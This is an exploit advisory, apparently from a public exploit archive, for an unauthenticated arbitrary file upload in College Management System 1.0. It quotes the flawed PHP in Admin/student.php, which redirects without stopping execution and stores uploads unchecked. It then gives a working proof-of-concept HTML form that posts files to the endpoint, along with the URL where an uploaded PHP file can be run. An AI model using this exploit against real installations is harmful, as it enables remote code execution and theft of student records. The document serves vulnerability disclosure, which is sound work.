College Management System 1.0 Arbitrary File Upload

College Management System version 1.0 suffers from an arbitrary file upload vulnerability.


MD5 | ae23bba60e3ab6a866b38a74d2226d16

# Exploit Title: college management system - Arbitrary File Upload (Unauthenticated)
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux


in Admin/student.php in line 1 :
<?php
session_start();
if (!$_SESSION["LoginAdmin"])
{
header('location:../login/login.php');

}
require_once "../connection/connection.php";
$_SESSION["LoginStudent"]="";
?>
in Admin/student.php line 77:

$profile_image = $_FILES['profile_image']['name'];$tmp_name=$_FILES['profile_image']['tmp_name'];$path = "images/".$profile_image;move_uploaded_file($tmp_name, $path);

$matric_certificate = $_FILES['matric_certificate']['name'];$tmp_name=$_FILES['matric_certificate']['tmp_name'];$path = "images/".$matric_certificate;move_uploaded_file($tmp_name, $path);

$fa_certificate = $_FILES['fa_certificate']['name'];$tmp_name=$_FILES['fa_certificate']['tmp_name'];$path = "images/".$fa_certificate;move_uploaded_file($tmp_name, $path);

$ba_certificate = $_FILES['ba_certificate']['name'];$tmp_name=$_FILES['ba_certificate']['tmp_name'];$path = "images/".$ba_certificate;move_uploaded_file($tmp_name, $path);

POC fileupload.html:
<html lang="en">
<head>
<title>exploit - file upload</title>
</head>
<body class="login-background">
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">

<!-- css style goes here -->

<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css" integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">


<!-- css style go to end here -->
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>


<div class="row m-3">
<div class="col-md-12">
<form action="http://127.0.0.1/2/College-Management-System/Admin/student.php" method="POST" enctype="multipart/form-data">
<div class="col-md-4">
<div class="form-group">
<label for="exampleInputPassword1">Your Profile Image:</label>
<input type="file" name="profile_image" placeholder="Student Age" class="form-control">
</div>
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="exampleInputPassword1">Upload Matric/OLevel Certificate:</label>
<input type="file" name="matric_certificate" class="form-control" value="there is no image">
</div>
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="exampleInputPassword1">Upload FA/ALevel Certificate:</label>
<input type="file" name="fa_certificate" class="form-control" value="there is no image" >
</div>
</div>
</div>
<div class="col-md-4">
<div class="form-group">
<label for="exampleInputPassword1">Upload BA Certificate:</label>
<input type="file" value="C:/xampp/htdocs/Imperial University/Images/no-image-available.jpg" name="ba_certificate" class="form-control" >
</div>
</div>
</div>
<div class="modal-footer">
<input type="submit" class="btn btn-primary px-5" name="btn_save">
</div>
</form>
</div>
</div>
link upload :
http://127.0.0.1/2/College-Management-System/Admin/images/@infosec_90.php

Related Posts